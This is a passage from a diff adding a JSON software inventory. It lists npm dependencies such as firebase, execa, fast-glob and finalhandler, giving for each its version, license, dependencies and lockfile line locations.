"ac4982c040715ad8" + }, + "Version": "3.2.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dom-serializer@2.0.0", + "domelementtype@2.3.0", + "domhandler@5.0.3" + ], + "Locations": [ + { + "StartLine": 7999, + "EndLine": 8012 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dooboolab-welcome@1.3.2", + "Name": "dooboolab-welcome", + "Identifier": { + "PURL": "pkg:npm/dooboolab-welcome@1.3.2", + "UID": "391bf2bd0021f343" + }, + "Version": "1.3.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8013, + "EndLine": 8022 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dot-case@3.0.4", + "Name": "dot-case", + "Identifier": { + "PURL": "pkg:npm/dot-case@3.0.4", + "UID": "b110045c2ba3a5aa" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "no-case@3.0.4", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 8023, + "EndLine": 8032 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "dunder-proto@1.0.1", + "Name": "dunder-proto", + "Identifier": { + "PURL": "pkg:npm/dunder-proto@1.0.1", + "UID": "5e0fbfeaa6edd664" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "es-errors@1.3.0", + "gopd@1.2.0" + ], + "Locations": [ + { + "StartLine": 8039, + "EndLine": 8052 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "eastasianwidth@0.2.0", + "Name": "eastasianwidth", + "Identifier": { + "PURL": "pkg:npm/eastasianwidth@0.2.0", + "UID": "53f18e1f9441982c" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8053, + "EndLine": 8058 + }, + { + "StartLine": 14279, + "EndLine": 14285 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ee-first@1.1.1", + "Name": "ee-first", + "Identifier": { + "PURL": "pkg:npm/ee-first@1.1.1", + "UID": "87900c11bb31de69" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8059, + "EndLine": 8064 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "electron-to-chromium@1.5.233", + "Name": "electron-to-chromium", + "Identifier": { + "PURL": "pkg:npm/electron-to-chromium@1.5.233", + "UID": "66039396398d03e" + }, + "Version": "1.5.233", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8065, + "EndLine": 8070 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "emoji-regex@8.0.0", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@8.0.0", + "UID": "bcb499b5e1978c54" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8084, + "EndLine": 8089 + }, + { + "StartLine": 14286, + "EndLine": 14292 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "emoji-regex@9.2.2", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@9.2.2", + "UID": "32aeba11b364bb58" + }, + "Version": "9.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3352, + "EndLine": 3357 + }, + { + "StartLine": 13579, + "EndLine": 13585 + }, + { + "StartLine": 15931, + "EndLine": 15937 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "encodeurl@1.0.2", + "Name": "encodeurl", + "Identifier": { + "PURL": "pkg:npm/encodeurl@1.0.2", + "UID": "d0b05858e12ee999" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8090, + "EndLine": 8098 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "encodeurl@2.0.0", + "Name": "encodeurl", + "Identifier": { + "PURL": "pkg:npm/encodeurl@2.0.0", + "UID": "cb4765174bcfd278" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19384, + "EndLine": 19392 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "encoding@0.1.13", + "Name": "encoding", + "Identifier": { + "PURL": "pkg:npm/encoding@0.1.13", + "UID": "f6d3c0313e68dda9" + }, + "Version": "0.1.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "iconv-lite@0.6.3" + ], + "Locations": [ + { + "StartLine": 8099, + "EndLine": 8107 + }, + { + "StartLine": 14293, + "EndLine": 14303 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "end-of-stream@1.4.5", + "Name": "end-of-stream", + "Identifier": { + "PURL": "pkg:npm/end-of-stream@1.4.5", + "UID": "457ff51239c0f42f" + }, + "Version": "1.4.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "once@1.4.0" + ], + "Locations": [ + { + "StartLine": 8120, + "EndLine": 8128 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "entities@2.0.3", + "Name": "entities", + "Identifier": { + "PURL": "pkg:npm/entities@2.0.3", + "UID": "4423a6f93af1f59d" + }, + "Version": "2.0.3", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12267, + "EndLine": 12272 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "entities@4.5.0", + "Name": "entities", + "Identifier": { + "PURL": "pkg:npm/entities@4.5.0", + "UID": "818854eeb62c24c2" + }, + "Version": "4.5.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8129, + "EndLine": 8140 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "env-paths@2.2.1", + "Name": "env-paths", + "Identifier": { + "PURL": "pkg:npm/env-paths@2.2.1", + "UID": "ecfe188e5092491f" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8141, + "EndLine": 8150 + }, + { + "StartLine": 14304, + "EndLine": 14313 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "envinfo@7.17.0", + "Name": "envinfo", + "Identifier": { + "PURL": "pkg:npm/envinfo@7.17.0", + "UID": "2e724fd7011ceda8" + }, + "Version": "7.17.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8151, + "EndLine": 8163 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "err-code@2.0.3", + "Name": "err-code", + "Identifier": { + "PURL": "pkg:npm/err-code@2.0.3", + "UID": "2a163f9a2b46cc5d" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8164, + "EndLine": 8170 + }, + { + "StartLine": 14314, + "EndLine": 14320 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "error-ex@1.3.4", + "Name": "error-ex", + "Identifier": { + "PURL": "pkg:npm/error-ex@1.3.4", + "UID": "bd9f56e67b348dc5" + }, + "Version": "1.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-arrayish@0.2.1" + ], + "Locations": [ + { + "StartLine": 8171, + "EndLine": 8179 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "error-stack-parser@2.1.4", + "Name": "error-stack-parser", + "Identifier": { + "PURL": "pkg:npm/error-stack-parser@2.1.4", + "UID": "58c5b60962d9e17f" + }, + "Version": "2.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "stackframe@1.3.4" + ], + "Locations": [ + { + "StartLine": 8180, + "EndLine": 8188 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "errorhandler@1.5.1", + "Name": "errorhandler", + "Identifier": { + "PURL": "pkg:npm/errorhandler@1.5.1", + "UID": "eb05d9008f77eb49" + }, + "Version": "1.5.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "accepts@1.3.8", + "escape-html@1.0.3" + ], + "Locations": [ + { + "StartLine": 8189, + "EndLine": 8202 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "es-define-property@1.0.1", + "Name": "es-define-property", + "Identifier": { + "PURL": "pkg:npm/es-define-property@1.0.1", + "UID": "c4337408528a00ae" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8272, + "EndLine": 8280 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "es-errors@1.3.0", + "Name": "es-errors", + "Identifier": { + "PURL": "pkg:npm/es-errors@1.3.0", + "UID": "e1e622ca7d308ae" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8281, + "EndLine": 8289 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "es-object-atoms@1.1.1", + "Name": "es-object-atoms", + "Identifier": { + "PURL": "pkg:npm/es-object-atoms@1.1.1", + "UID": "13c55c7fab650fa0" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0" + ], + "Locations": [ + { + "StartLine": 8318, + "EndLine": 8329 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "es-set-tostringtag@2.1.0", + "Name": "es-set-tostringtag", + "Identifier": { + "PURL": "pkg:npm/es-set-tostringtag@2.1.0", + "UID": "1952ae335638f8c2" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "get-intrinsic@1.3.0", + "has-tostringtag@1.0.2", + "hasown@2.0.2" + ], + "Locations": [ + { + "StartLine": 8330, + "EndLine": 8344 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "escalade@3.2.0", + "Name": "escalade", + "Identifier": { + "PURL": "pkg:npm/escalade@3.2.0", + "UID": "8793bbf738a44899" + }, + "Version": "3.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8376, + "EndLine": 8384 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "escape-html@1.0.3", + "Name": "escape-html", + "Identifier": { + "PURL": "pkg:npm/escape-html@1.0.3", + "UID": "de9ae5bd2ce464cd" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8385, + "EndLine": 8390 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "escape-string-regexp@1.0.5", + "Name": "escape-string-regexp", + "Identifier": { + "PURL": "pkg:npm/escape-string-regexp@1.0.5", + "UID": "53769a8bbdbd448c" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 539, + "EndLine": 547 + }, + { + "StartLine": 8493, + "EndLine": 8502 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "escape-string-regexp@2.0.0", + "Name": "escape-string-regexp", + "Identifier": { + "PURL": "pkg:npm/escape-string-regexp@2.0.0", + "UID": "54702fa43eab6ca3" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19988, + "EndLine": 19996 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "escape-string-regexp@4.0.0", + "Name": "escape-string-regexp", + "Identifier": { + "PURL": "pkg:npm/escape-string-regexp@4.0.0", + "UID": "d47f9272e2dbc3e2" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8391, + "EndLine": 8402 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "esprima@4.0.1", + "Name": "esprima", + "Identifier": { + "PURL": "pkg:npm/esprima@4.0.1", + "UID": "146718cab21ff18c" + }, + "Version": "4.0.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8918, + "EndLine": 8930 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "etag@1.8.1", + "Name": "etag", + "Identifier": { + "PURL": "pkg:npm/etag@1.8.1", + "UID": "dc377867e0cce19f" + }, + "Version": "1.8.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8977, + "EndLine": 8985 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "event-target-shim@5.0.1", + "Name": "event-target-shim", + "Identifier": { + "PURL": "pkg:npm/event-target-shim@5.0.1", + "UID": "9ad7a04f77376293" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8986, + "EndLine": 8994 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "events@3.3.0", + "Name": "events", + "Identifier": { + "PURL": "pkg:npm/events@3.3.0", + "UID": "1927628ef232fb58" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8995, + "EndLine": 9003 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "events-universal@1.0.1", + "Name": "events-universal", + "Identifier": { + "PURL": "pkg:npm/events-universal@1.0.1", + "UID": "d054ec45646ba7c0" + }, + "Version": "1.0.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bare-events@2.7.0" + ], + "Locations": [ + { + "StartLine": 9004, + "EndLine": 9012 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "execa@5.1.1", + "Name": "execa", + "Identifier": { + "PURL": "pkg:npm/execa@5.1.1", + "UID": "fd7bc0d1b5d808b0" + }, + "Version": "5.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cross-spawn@7.0.6", + "get-stream@6.0.1", + "human-signals@2.1.0", + "is-stream@2.0.1", + "merge-stream@2.0.0", + "npm-run-path@4.0.1", + "onetime@5.1.2", + "signal-exit@3.0.7", + "strip-final-newline@2.0.0" + ], + "Locations": [ + { + "StartLine": 9013, + "EndLine": 9035 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "expand-template@2.0.3", + "Name": "expand-template", + "Identifier": { + "PURL": "pkg:npm/expand-template@2.0.3", + "UID": "9a012b9c90de7151" + }, + "Version": "2.0.3", + "Licenses": [ + "(MIT OR WTFPL)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9045, + "EndLine": 9053 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "exponential-backoff@3.1.2", + "Name": "exponential-backoff", + "Identifier": { + "PURL": "pkg:npm/exponential-backoff@3.1.2", + "UID": "e5bd6412cb794688" + }, + "Version": "3.1.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9071, + "EndLine": 9076 + }, + { + "StartLine": 14321, + "EndLine": 14327 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-base64-decode@1.0.0", + "Name": "fast-base64-decode", + "Identifier": { + "PURL": "pkg:npm/fast-base64-decode@1.0.0", + "UID": "dfb00b78303e08eb" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9077, + "EndLine": 9082 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-deep-equal@3.1.3", + "Name": "fast-deep-equal", + "Identifier": { + "PURL": "pkg:npm/fast-deep-equal@3.1.3", + "UID": "81825502b7c2d676" + }, + "Version": "3.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9083, + "EndLine": 9088 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-fifo@1.3.2", + "Name": "fast-fifo", + "Identifier": { + "PURL": "pkg:npm/fast-fifo@1.3.2", + "UID": "a9d5e3ec4633ac3a" + }, + "Version": "1.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9089, + "EndLine": 9094 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-glob@3.3.3", + "Name": "fast-glob", + "Identifier": { + "PURL": "pkg:npm/fast-glob@3.3.3", + "UID": "e59121081eff05d1" + }, + "Version": "3.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.stat@2.0.5", + "@nodelib/fs.walk@1.2.8", + "glob-parent@5.1.2", + "merge2@1.4.1", + "micromatch@4.0.8" + ], + "Locations": [ + { + "StartLine": 9095, + "EndLine": 9110 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-json-stable-stringify@2.1.0", + "Name": "fast-json-stable-stringify", + "Identifier": { + "PURL": "pkg:npm/fast-json-stable-stringify@2.1.0", + "UID": "d1d23b0ffba3e915" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9123, + "EndLine": 9128 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fast-xml-parser@4.5.3", + "Name": "fast-xml-parser", + "Identifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "457040697ff9b71f" + }, + "Version": "4.5.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "strnum@1.1.2" + ], + "Locations": [ + { + "StartLine": 9136, + "EndLine": 9153 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fastest-levenshtein@1.0.16", + "Name": "fastest-levenshtein", + "Identifier": { + "PURL": "pkg:npm/fastest-levenshtein@1.0.16", + "UID": "a3dceb3ed3fda8de" + }, + "Version": "1.0.16", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14328, + "EndLine": 14337 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fastq@1.19.1", + "Name": "fastq", + "Identifier": { + "PURL": "pkg:npm/fastq@1.19.1", + "UID": "60047bfc70570d5b" + }, + "Version": "1.19.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "reusify@1.1.0" + ], + "Locations": [ + { + "StartLine": 9154, + "EndLine": 9162 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "faye-websocket@0.11.4", + "Name": "faye-websocket", + "Identifier": { + "PURL": "pkg:npm/faye-websocket@0.11.4", + "UID": "839bc13998666b84" + }, + "Version": "0.11.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "websocket-driver@0.7.4" + ], + "Locations": [ + { + "StartLine": 9163, + "EndLine": 9174 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fb-watchman@2.0.2", + "Name": "fb-watchman", + "Identifier": { + "PURL": "pkg:npm/fb-watchman@2.0.2", + "UID": "6765abef166bbbe9" + }, + "Version": "2.0.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bser@2.1.1" + ], + "Locations": [ + { + "StartLine": 9175, + "EndLine": 9183 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fbjs@0.8.18", + "Name": "fbjs", + "Identifier": { + "PURL": "pkg:npm/fbjs@0.8.18", + "UID": "92f7ec3a992b2131" + }, + "Version": "0.8.18", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "core-js@1.2.7", + "isomorphic-fetch@2.2.1", + "loose-envify@1.4.0", + "object-assign@4.1.1", + "promise@7.3.1", + "setimmediate@1.0.5", + "ua-parser-js@0.7.41" + ], + "Locations": [ + { + "StartLine": 9184, + "EndLine": 9198 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fdir@6.5.0", + "Name": "fdir", + "Identifier": { + "PURL": "pkg:npm/fdir@6.5.0", + "UID": "c41e14fe1034808e" + }, + "Version": "6.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "picomatch@4.0.3" + ], + "Locations": [ + { + "StartLine": 15736, + "EndLine": 15751 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "file-uri-to-path@1.0.0", + "Name": "file-uri-to-path", + "Identifier": { + "PURL": "pkg:npm/file-uri-to-path@1.0.0", + "UID": "707265f9e5bc442c" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9221, + "EndLine": 9227 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fill-range@7.1.1", + "Name": "fill-range", + "Identifier": { + "PURL": "pkg:npm/fill-range@7.1.1", + "UID": "7305a943c9b7ed7e" + }, + "Version": "7.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "to-regex-range@5.0.1" + ], + "Locations": [ + { + "StartLine": 9228, + "EndLine": 9239 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "filter-obj@1.1.0", + "Name": "filter-obj", + "Identifier": { + "PURL": "pkg:npm/filter-obj@1.1.0", + "UID": "e8a47a35b15b51b2" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9240, + "EndLine": 9248 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "finalhandler@1.1.2", + "Name": "finalhandler", + "Identifier": { + "PURL": "pkg:npm/finalhandler@1.1.2", + "UID": "a28763a95bc0e71f" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "encodeurl@1.0.2", + "escape-html@1.0.3", + "on-finished@2.3.0", + "parseurl@1.3.3", + "statuses@1.5.0", + "unpipe@1.0.0" + ], + "Locations": [ + { + "StartLine": 9249, + "EndLine": 9266 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "find-babel-config@2.1.2", + "Name": "find-babel-config", + "Identifier": { + "PURL": "pkg:npm/find-babel-config@2.1.2", + "UID": "68d220281a2e65e4" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "json5@2.2.3" + ], + "Locations": [ + { + "StartLine": 9294, + "EndLine": 9302 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "find-up@3.0.0", + "Name": "find-up", + "Identifier": { + "PURL": "pkg:npm/find-up@3.0.0", + "UID": "a1bec6a69be531a" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "locate-path@3.0.0" + ], + "Locations": [ + { + "StartLine": 16684, + "EndLine": 16695 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "find-up@4.1.0", + "Name": "find-up", + "Identifier": { + "PURL": "pkg:npm/find-up@4.1.0", + "UID": "97be746629fb519a" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "locate-path@5.0.0", + "path-exists@4.0.0" + ], + "Locations": [ + { + "StartLine": 3441, + "EndLine": 3453 + }, + { + "StartLine": 11947, + "EndLine": 11960 + }, + { + "StartLine": 16616, + "EndLine": 16629 + }, + { + "StartLine": 18801, + "EndLine": 18813 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "find-up@5.0.0", + "Name": "find-up", + "Identifier": { + "PURL": "pkg:npm/find-up@5.0.0", + "UID": "651f74b7d4dba4e1" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "locate-path@6.0.0", + "path-exists@4.0.0" + ], + "Locations": [ + { + "StartLine": 9303, + "EndLine": 9318 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "firebase@12.2.1", + "Name": "firebase", + "Identifier": { + "PURL": "pkg:npm/firebase@12.2.1", + "UID": "7f06a3247e30d9a1" + }, + "Version": "12.2.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/ai@2.2.1", + "@firebase/analytics-compat@0.2.24", + "@firebase/analytics@0.10.18", + "@firebase/app-check-compat@0.4.0", + "@firebase/app-check@0.11.0", + "@firebase/app-compat@0.5.2", + "@firebase/app-types@0.9.3", + "@firebase/app@0.14.2", + "@firebase/auth-compat@0.6.0", + "@firebase/auth@1.11.0", + "@firebase/data-connect@0.3.11", + "@firebase/database-compat@2.1.0", + "@firebase/database@1.1.0", + "@firebase/firestore-compat@0.4.1", + "@firebase/firestore@4.9.1", + "@firebase/functions-compat@0.4.1", + "@firebase/functions@0.13.1", + "@firebase/installations-compat@0.2.19", + "@firebase/installations@0.6.19", + "@firebase/messaging-compat@0.2.23", + "@firebase/messaging@0.12.23", + "@firebase/performance-compat@0.2.22", + "@firebase/performance@0.7.9", + "@firebase/remote-config-compat@0.2.19", + "@firebase/remote-config@0.6.6", + "@firebase/storage-compat@0.4.0", + "@firebase/storage@0.14.0", + "@firebase/util@1.13.0" + ], + "Locations": [ + { + "StartLine": 9329, + "EndLine": 9364 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "flow-enums-runtime@0.0.6", + "Name": "flow-enums-runtime", + "Identifier": { + "PURL": "pkg:npm/flow-enums-runtime@0.0.6", + "UID": "78796925a3618842" + }, + "Version": "0.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9387, + "EndLine": 9392 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "follow-redirects@1.15.11", + "Name": "follow-redirects", + "Identifier": { + "PURL": "pkg:npm/follow-redirects@1.15.11", + "UID": "7f24cc7faa596a4d" + }, + "Version": "1.15.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9393, + "EndLine": 9412 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "for-each@0.3.5", + "Name": "for-each", + "Identifier": { + "PURL": "pkg:npm/for-each@0.3.5", + "UID": "645291bd7477a660" + }, + "Version": "0.3.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-callable@1.2.7" + ], + "Locations": [ + { + "StartLine": 9413, + "EndLine": 9427 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "foreground-child@3.3.1", + "Name": "foreground-child", + "Identifier": { + "PURL": "pkg:npm/foreground-child@3.3.1", + "UID": "31e4ec9dde18212e" + }, + "Version": "3.3.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cross-spawn@7.0.6", + "signal-exit@4.1.0" + ], + "Locations": [ + { + "StartLine": 9428, + "EndLine": 9443 + }, + { + "StartLine": 14338, + "EndLine": 14354 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "form-data@4.0.4", + "Name": "form-data", + "Identifier": { + "PURL": "pkg:npm/form-data@4.0.4", + "UID": "e0d9725464abbdec" + }, + "Version": "4.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "asynckit@0.4.0", + "combined-stream@1.0.8", + "es-set-tostringtag@2.1.0", + "hasown@2.0.2", + "mime-types@2.1.35" + ], + "Locations": [ + { + "StartLine": 9456, + "EndLine": 9471 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fresh@0.5.2", + "Name": "fresh", + "Identifier": { + "PURL": "pkg:npm/fresh@0.5.2", + "UID": "4554a57bf4d6c3ba" + }, + "Version": "0.5.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9472, + "EndLine": 9480 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fs-constants@1.0.0", + "Name": "fs-constants", + "Identifier": { + "PURL": "pkg:npm/fs-constants@1.0.0", + "UID": "1bfac524859a4828" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9481, + "EndLine": 9486 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fs-extra@11.3.2", + "Name": "fs-extra", + "Identifier": { + "PURL": "pkg:npm/fs-extra@11.3.2", + "UID": "6c78632ba66aed79" + }, + "Version": "11.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + 